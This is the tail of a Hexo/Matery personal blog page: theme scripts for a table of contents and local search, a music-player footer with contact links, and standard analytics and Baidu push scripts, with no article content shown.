        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">hzk</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shianer" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:292595085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=292595085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 292595085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
